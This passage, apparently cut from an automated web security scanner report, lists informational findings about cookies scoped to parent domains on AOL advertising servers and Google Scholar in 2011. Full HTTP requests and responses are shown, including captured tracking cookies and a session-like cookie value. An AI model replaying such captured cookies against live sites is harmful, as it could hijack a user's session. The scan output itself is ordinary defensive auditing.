Set-Cookie: C2=6XfwN5pqEIxFGJpovUg3sY0NSKMCItdBwhQ3WXAcIoLOGAHCKGeBwhQ3gZAcIMa4FAHCEGeBwhAmoZAcIwtlGAHCA9qBwhw2kXAcIsijGAHCGenBwhQQvaAcI0kmGAHC3mpBwVrqFoxsGdTtrWQIzawYRGQBg2cxLam5IaoBxOSBsRphj1I9HsfzF68i4WQBwWElmtCqGvJseWw7RaooVSfBrLqRUOJUFQT2FKKruXQAzZoo0KXBbzqhim6BF8sXGKKogZwrgY8JzWtBkoqR2N67GcNNG5akAfwuRXslum/BEOpREPLUHsEpG9Mq+fQoeZY1fO8BgwhB9X7/IUJtGrlZpTrxSGqFI09IGAXo8iw5qYAcY6ACsMiBwhAnjaAc; domain=advertising.com; expires=Sat, 04-May-2013 00:57:30 GMT; path=/
Set-Cookie: F1=Bof9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAQAA+CA; domain=advertising.com; expires=Sat, 04-May-2013 00:57:30 GMT; path=/
Set-Cookie: BASE=RgwqyyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DNolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgo700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9B!; domain=advertising.com; expires=Sat, 04-May-2013 00:57:30 GMT; path=/
Set-Cookie: ROLL=boAnq2C+PRAglcGLPJnzdbH8d75VK2B!; domain=advertising.com; expires=Sat, 04-May-2013 00:57:30 GMT; path=/
Set-Cookie: 26673240=_4dc1f5fa,0284425102,790523^1002049^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 05 May 2011 00:57:30 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 1571

document.write('<HTML>');document.write('<HEAD>');document.write('<TITLE>&nbsp;</TITLE>');document.write('</HEAD>');document.write('<BODY>');document.write('<OBJECT classid=\'clsid:D27CDB6E-AE6D-11cf-
...[SNIP]...

16.96. http://r1-ads.ace.advertising.com/site=790523/size=728090/u=2/bnum=35460744/xsxdata=1:93306882/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/xscinfo=bsd:19931900/dref=http%253A%252F%252Fwww.mmafighting.com%252F2011%252F05%252F04%252Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%252F%253Ficid%253Dmaing-grid7%25257Cmain5%25257Cdl4%25257Csec3_lnk1%25257C60545

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=790523/size=728090/u=2/bnum=35460744/xsxdata=1:93306882/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/xscinfo=bsd:19931900/dref=http%253A%252F%252Fwww.mmafighting.com%252F2011%252F05%252F04%252Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%252F%253Ficid%253Dmaing-grid7%25257Cmain5%25257Cdl4%25257Csec3_lnk1%25257C60545

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=790523/size=728090/u=2/bnum=35460744/xsxdata=1:93306882/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/xscinfo=bsd:19931900/dref=http%253A%252F%252Fwww.mmafighting.com%252F2011%252F05%252F04%252Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%252F%253Ficid%253Dmaing-grid7%25257Cmain5%25257Cdl4%25257Csec3_lnk1%25257C60545 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; F1=BAf9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAMAA+CA; BASE=RgwqxyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DNolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgo700b6zAWA9p1kL5hoC+WRIuMIIHK!; ROLL=boAnr2C+PRAglcGLPJnzdbH!; C2=wXfwN5pqEIxFGJpovUg3sY0NSKMCItdBwhQ3WXAcIoLOGAHCKGeBwhQ3gZAcIMa4FAHCEGeBwhAmoZAcIwtlGAHCA9qBwhw2kXAcIsijGAHCGenBwhQQvaAcI0kmGAHC3mpBwVrqFoxsGdTtrWQIzawYRGQBg2cxLam5IaoBxOSBsRphj1I9HsfzF68i4WQBwWElmtCqGvJseWw7RaooVSfBrLqRUOJUFQT2FKKruXQAzZoo0KXBbzqhim6BF8sXGKKogZwrgY8JzWtBkoqR2N67GcNNG5akAfwuRXslum/BEOpREPLUHsEpG9Mq+fQoeZY1fO8BgwhB9X7/IUJtGrlZpTrxSGqFI09IGAXo8iw5qYAcY6ACsMiBwB; GUID=MTMwNDU1NzA0MDsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 00:57:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.981190.790523.93306882XMC
Set-Cookie: C2=6XfwN5pqEIxFGJpovUg3sY0NSKMCItdBwhQ3WXAcIoLOGAHCKGeBwhQ3gZAcIMa4FAHCEGeBwhAmoZAcIwtlGAHCA9qBwhw2kXAcIsijGAHCGenBwhQQvaAcI0kmGAHC3mpBwVrqFoxsGdTtrWQIzawYRGQBg2cxLam5IaoBxOSBsRphj1I9HsfzF68i4WQBwWElmtCqGvJseWw7RaooVSfBrLqRUOJUFQT2FKKruXQAzZoo0KXBbzqhim6BF8sXGKKogZwrgY8JzWtBkoqR2N67GcNNG5akAfwuRXslum/BEOpREPLUHsEpG9Mq+fQoeZY1fO8BgwhB9X7/IUJtGrlZpTrxSGqFI09IGAXo8iw5qYAcY6ACsMiBwhAnjaAc; domain=advertising.com; expires=Sat, 04-May-2013 00:57:30 GMT; path=/
Set-Cookie: F1=Bof9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAQAA+CA; domain=advertising.com; expires=Sat, 04-May-2013 00:57:30 GMT; path=/
Set-Cookie: BASE=RgwqxyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DNolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgo700b6zAWA9p1kL5hoC+WRIuMIIHK!; domain=advertising.com; expires=Sat, 04-May-2013 00:57:30 GMT; path=/
Set-Cookie: ROLL=boAnq2C+PRAglcGLPJnzdbHyJN5VK2B!; domain=advertising.com; expires=Sat, 04-May-2013 00:57:30 GMT; path=/
Set-Cookie: 35460744=_4dc1f5fa,0551647852,790523^981190^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 05 May 2011 00:57:30 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 1561

document.write('<HTML>');document.write('<HEAD>');document.write('<TITLE>&nbsp;</TITLE>');document.write('</HEAD>');document.write('<BODY>');document.write('<OBJECT classid=\'clsid:D27CDB6E-AE6D-11cf-
...[SNIP]...

16.97. http://r1-ads.ace.advertising.com/site=800563/size=300250/u=2/bnum=84248618/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.huffingtonpost.com%252F%253Ficid%253Dnavbar_huffpo_main5

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=800563/size=300250/u=2/bnum=84248618/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.huffingtonpost.com%252F%253Ficid%253Dnavbar_huffpo_main5

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=800563/size=300250/u=2/bnum=84248618/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.huffingtonpost.com%252F%253Ficid%253Dnavbar_huffpo_main5 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; GUID=MTMwNDU1NzExMTsxOjE2cjRvcHExdHZsa21sOjM2NQ; C2=3YfwN5pqEIxFGJpovUg3sY0NSKMCItdBwhQ3WXAcIoLOGAHCKGeBwhwmhXAcI8eDGAHCdDmBwhwohXAcIQY4FAHCYimBwhA3WaAcIA0rGAHC25lBwhg/VYAcIsN5FAHCr4oBwhwtZaAcIoN5FAHCFBqBwhQTaaAcIE0rGAHCGenBwhwoyaAc1qaBaMrR3U7qFEysGMWkBUAoNX8imZOiGaQsjUAbUa4YNS/B73chOvIuFUAsFRpZrgqxbCrnF8ekGKal0Xw6iaElTCVB0kdhiyq7FEwcGKKtyVw2saoopeQBP7lhiCKYG8KIGfysVbAJqakdj+uBXTjRuGJwHsb0Fbpr5fAhTaExzC1BLRqRPjq/HEqXGW9nDfAIcYQ/1+PCVSrxaZW60askhaBCdPiBwFKvIcuKGAHmOgALjYAcIw5oGAHCxbfBwB; F1=Bcj9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAUAA+CA; BASE=RgwqzyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DNolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgo700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3GAQ4I!; ROLL=boAnt2C+PRAglcGLPJnzdbH8d75VK2BUk5QpnoE!

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 00:58:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.894873.800563.0XMC
Set-Cookie: C2=7YfwN5pqEIxFGJpovUg3sY0NSKMCItdBwhQ3WXAcIoLOGAHCKGeBwhwmhXAcI8eDGAHCdDmBwhwohXAcIQY4FAHCYimBwhA3WaAcIA0rGAHC25lBwhg/VYAcIsN5FAHCr4oBwhwtZaAcIoN5FAHCFBqBwhQTaaAcIE0rGAHCGenBwhwoyaAc1qaBaMrR3U7qFEysGMWkBUAoNX8imZOiGgasjUAbUa4YNSPC73cBwtIuFUAsFRpZrgqxbCrnF8ekGKal0Xw6iaElTCVB0kdhiyq7FEwcGKKtyVw2saoopeQBP7lhiCKYG8KIGfysVbAJqakdj+uBXTjRuGJwHsb0Fbpr5fAhTaExzC1BLRqRPjq/HEqXGW9nDfAIcYQ/1+PCVSrxaZW60askhaBCdPiBwFKvIcuKGAHmOgALjYAcIw5oGAHCxbfBwB; domain=advertising.com; expires=Sat, 04-May-2013 00:58:34 GMT; path=/
Set-Cookie: F1=Bsj9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAYAA+CA; domain=advertising.com; expires=Sat, 04-May-2013 00:58:34 GMT; path=/
Set-Cookie: BASE=RgwqzyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgo700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3GAQ4I!; domain=advertising.com; expires=Sat, 04-May-2013 00:58:34 GMT; path=/
Set-Cookie: ROLL=boAns2C+PRAglcGLPJnzdbH8d75VK2BUk5Qpno0+3KawIeB!; domain=advertising.com; expires=Sat, 04-May-2013 00:58:34 GMT; path=/
Set-Cookie: 84248618=_4dc1f63b,0642027268,800563^894873^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 05 May 2011 00:58:34 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 676

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253735206/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000800563/mnum=0000894
...[SNIP]...

16.98. http://r1-ads.ace.advertising.com/site=804145/size=300250/u=2/bnum=31568465/xsxdata=1:93313567/hr=0/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fwww.huffingtonpost.com%252F2011%252F05%252F04%252Fosama-bin-laden-pictures_n_857568.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=804145/size=300250/u=2/bnum=31568465/xsxdata=1:93313567/hr=0/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fwww.huffingtonpost.com%252F2011%252F05%252F04%252Fosama-bin-laden-pictures_n_857568.html

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=804145/size=300250/u=2/bnum=31568465/xsxdata=1:93313567/hr=0/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fwww.huffingtonpost.com%252F2011%252F05%252F04%252Fosama-bin-laden-pictures_n_857568.html HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; F1=Bsj9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAYAA+CA; BASE=RgwqzyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgo700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3GAQ4I!; ROLL=boAns2C+PRAglcGLPJnzdbH8d75VK2BUk5Qpno0+3KawIeB!; C2=cZfwN5pqEIxFGJpovUg3sY0NSKMCItdBwhQ3WXAcIsY4FAHCw3gBwhgu4YAcIoY4FAHCbGeBwhw7NYAcI0NYGAHCjGeBwhAhhXAcIgJaGAHCcbpBwhAQvaAcIYnXGAHC+XhBwhw2kXAcIsijGAHCaTeBwhwtZaAcIE0rGAHCFBqBwhQTaaAcI0soGAHCGenBwVrqFoxsGdTtrWQIzawYRGQBg2cxLam5IaAqxOSBsRphj1I9IsfzFA3i4WQBwWElmtCqGvJseWw7RaooVSfBrLqRUOJUFQT2FKKruXQAzZoo0KXBbzqhim6BF8sXGKKogZwrgY8JzWtBkoqR2N67GcNNG5akAfwuRXslum/BEOpREPLUHsEpG9Mq+fQoeZY1fO8BgwhB9X7/IUJtGrlZpTrxSGqFI09IGAXo8iw5qYAcY6ACsMiBwhAnjaAcIEv9FAH; GUID=MTMwNDU1NzE0ODsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 00:59:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.956559.804145.93313567XMC
Set-Cookie: F1=B0n9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAcAA+CA; domain=advertising.com; expires=Sat, 04-May-2013 00:59:42 GMT; path=/
Set-Cookie: BASE=RgwqzyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3GAQ4I!; domain=advertising.com; expires=Sat, 04-May-2013 00:59:42 GMT; path=/
Set-Cookie: ROLL=boAnv2C+PRAglcGLPJnzdbH8d75VK2BUk5Qpno0+3KawIexFgigakxI!; domain=advertising.com; expires=Sat, 04-May-2013 00:59:42 GMT; path=/
Set-Cookie: 31568465=_4dc1f67d,1346633562,804145^956559^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 05 May 2011 00:59:41 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 669

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/242390405/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000804145/mnum=0000956
...[SNIP]...

16.99. http://r1-ads.ace.advertising.com/site=804145/size=728090/u=2/bnum=24626462/xsxdata=1:93312584/hr=0/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fwww.huffingtonpost.com%252F2011%252F05%252F04%252Fosama-bin-laden-pictures_n_857568.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=804145/size=728090/u=2/bnum=24626462/xsxdata=1:93312584/hr=0/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fwww.huffingtonpost.com%252F2011%252F05%252F04%252Fosama-bin-laden-pictures_n_857568.html

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=804145/size=728090/u=2/bnum=24626462/xsxdata=1:93312584/hr=0/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fwww.huffingtonpost.com%252F2011%252F05%252F04%252Fosama-bin-laden-pictures_n_857568.html HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; F1=Bsj9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAYAA+CA; BASE=RgwqzyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgo700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3GAQ4I!; ROLL=boAns2C+PRAglcGLPJnzdbH8d75VK2BUk5Qpno0+3KawIeB!; C2=cZfwN5pqEIxFGJpovUg3sY0NSKMCItdBwhQ3WXAcIsY4FAHCw3gBwhgu4YAcIoY4FAHCbGeBwhw7NYAcI0NYGAHCjGeBwhAhhXAcIgJaGAHCcbpBwhAQvaAcIYnXGAHC+XhBwhw2kXAcIsijGAHCaTeBwhwtZaAcIE0rGAHCFBqBwhQTaaAcI0soGAHCGenBwVrqFoxsGdTtrWQIzawYRGQBg2cxLam5IaAqxOSBsRphj1I9IsfzFA3i4WQBwWElmtCqGvJseWw7RaooVSfBrLqRUOJUFQT2FKKruXQAzZoo0KXBbzqhim6BF8sXGKKogZwrgY8JzWtBkoqR2N67GcNNG5akAfwuRXslum/BEOpREPLUHsEpG9Mq+fQoeZY1fO8BgwhB9X7/IUJtGrlZpTrxSGqFI09IGAXo8iw5qYAcY6ACsMiBwhAnjaAcIEv9FAH; GUID=MTMwNDU1NzE0ODsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 00:59:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.894875.804145.93312584XMC
Set-Cookie: F1=B0n9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAcAA+CA; domain=advertising.com; expires=Sat, 04-May-2013 00:59:41 GMT; path=/
Set-Cookie: BASE=RgwqzyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2unWu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgo700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3GAQ4I!; domain=advertising.com; expires=Sat, 04-May-2013 00:59:41 GMT; path=/
Set-Cookie: ROLL=boAnv2C+PRAglcGLPJnzdbH8d75VK2BUk5Qpno0+3KawIextYFhakxI!; domain=advertising.com; expires=Sat, 04-May-2013 00:59:41 GMT; path=/
Set-Cookie: 24626462=_4dc1f67d,5365043223,804145^894875^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 05 May 2011 00:59:41 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 669

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253735207/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000804145/mnum=0000894
...[SNIP]...

16.100. http://realestate.aol.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://realestate.aol.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?icid=navbar_realest_main5 HTTP/1.1
Host: realestate.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304575091494-Repeat%7C1367647091494%3B%20s_nrgvo%3DRepeat%7C1367647091495%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:43 GMT
Server: Apache-Coyote/1.1
Set-Cookie: RSP_COOKIE=aid=d2c1780676b211e0b997d2532fe826c9; path=/; domain=.aol.com; expires=Fri May 04 00:58:43 2012 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: userNum=98; Expires=Sat, 04-Jun-2011 00:58:43 GMT
Content-Length: 51590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

16.101. http://scholar.google.com/schhp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scholar.google.com
Path:   /schhp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /schhp HTTP/1.1
Host: scholar.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: GSP=ID=4daec4b7993eb97d; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/; domain=.scholar.google.com
Set-Cookie: PREF=ID=4daec4b7993eb97d:TM=1304592839:LM=1304592839:S=EvjNjDbhiidMVIdd; expires=Sat, 04-May-2013 10:53:59 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
